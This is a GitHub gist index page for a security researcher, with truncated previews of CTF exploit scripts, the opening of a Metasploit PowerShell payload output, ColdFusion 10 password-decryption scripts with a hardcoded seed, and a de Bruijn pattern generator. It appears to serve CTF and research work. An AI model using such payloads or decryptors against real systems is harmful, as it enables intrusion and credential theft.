Skip to content

Instantly share code, notes, and snippets.

View dwendt's full-sized avatar
⁉️
hello

Ditmar Wendt dwendt

⁉️
hello
52 followers · 6 following
View GitHub Profile
@dwendt
dwendt / bank_rwctf_2019.py
Created September 16, 2019 22:06
bank.py rwctf 2019
from pwn import *
import IPython
import sha
import sys
import itertools
import string
from base64 import b64encode
from base64 import b64decode
from schnorr import *
@dwendt
dwendt / www.py
Last active May 14, 2018 06:08
dc18 quals, all the good parts of this code belong to jeffball
from pwn import *
from pow import solve_pow
#from network_util import *
import struct
#fd = open("m68k.bin", "r")
#shellcode = fd.read()
#fd.close()
def p32(v):
return struct.pack(">i",v)
@dwendt
dwendt / welp.txt
Created May 23, 2017 23:38
welp
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of cmd/powershell_base64
cmd/powershell_base64 succeeded with size 333 (iteration=0)
cmd/powershell_base64 chosen with final size 333
Payload size: 333 bytes
Final size of psh file: 2374 bytes
$NHEpDZWJXk = @"
[DllImport("kernel32.dll")]
@dwendt
dwendt / coldfusion10decrypt.rb
Created May 22, 2017 19:03
require 'openssl'
require 'base64'
require 'rexml/document'
include REXML
# pull this from seed.properties
SEED = 'EB3452127614E25A'
def decrypt(cpass)
@dwendt
dwendt / coldfusion10decrypt.rb
Created May 22, 2017 18:35
require 'openssl'
require 'base64'
SEED = 'EB3452127614E25A'
strings = ["TWMQJJtbRUD5FJur/SuWmW53rumcHkzZGS6TqK3CTvM=", "ZGG8VSEQSeJL45huJFIl3oLX0UE5tVlchKvXsGdYprQ=", "HybRUpUK8tXT0++qaOX+vNYYclDJsx2gBfLFc8j8N34=", "g4YT2OoY8qIG0M7BzrKI7CJMwv2KzVFBlAuSsZByErA="]
encryptedString = "g4YT2OoY8qIG0M7BzrKI7CJMwv2KzVFBlAuSsZByErA="
def decrypt(cpass)
@dwendt
dwendt / keybase.md
Created March 24, 2017 16:10

Keybase proof

I hereby claim:

  • I am dwendt on github.
  • I am dwn (https://keybase.io/dwn) on keybase.
  • I have a public key ASBWYRBdrYcszXAvxjy6REZ4jFQx7DGWnvfF0slVL9T_9Ao

To claim this, I am signing this object:

@dwendt
dwendt / gist:c25895fde82730b8f17f
Created March 25, 2016 15:00
SunCTF scores that CTFTime won't accept
{
"standings": [
{
"id": 393,
"pos": 1,
"score": 1905,
"team": "eipiplus1equals0"
},
{
"id": 135,
@dwendt
dwendt / gist:ccf548cf646f1bce3d11
Created July 20, 2015 23:37
prolog soln for sdhit
@dwendt
dwendt / defcon15_quals_thing2.md
Created July 16, 2015 07:51
defcon15_quals_thing2.md

LegitBS Quals 2015 - thing2 (4pts)

For this pwnable we've got a zip with AppJailLauncher.exe and thing2.exe. This means we get to experience the wonders of ASLR+DEP+Win8.1 🔥 tl;dr ruby solution

Prerequisite Knowledge

  • C++ Object Memory Layout (Virtual Function Tables)
  • Windows 64bit ABI / Calling Convention
  • ASLR, DEP/NX
  • ROP
@dwendt
dwendt / gist:5cc5223d4686d0e33209
Last active August 29, 2015 14:24
memoArr = {};
var charset = "A%sB$nC-(D;)Ea0Fb1Gc2Hd3Ie4Jf5Kg6Lh7Mi8Nj9OkPlQmRnSoTpUqVrWsXtYuZvwxyz"; // default gdb-peda charset
function deBruijn (charset, maxlen, n) {
var k = charset.length;
var a = [];
for (var i = 0; i < k * n; i++) a.push(0);
if (maxlen.toString() in memoArr)
return memoArr[maxlen.toString()];
for (var k in memoArr) {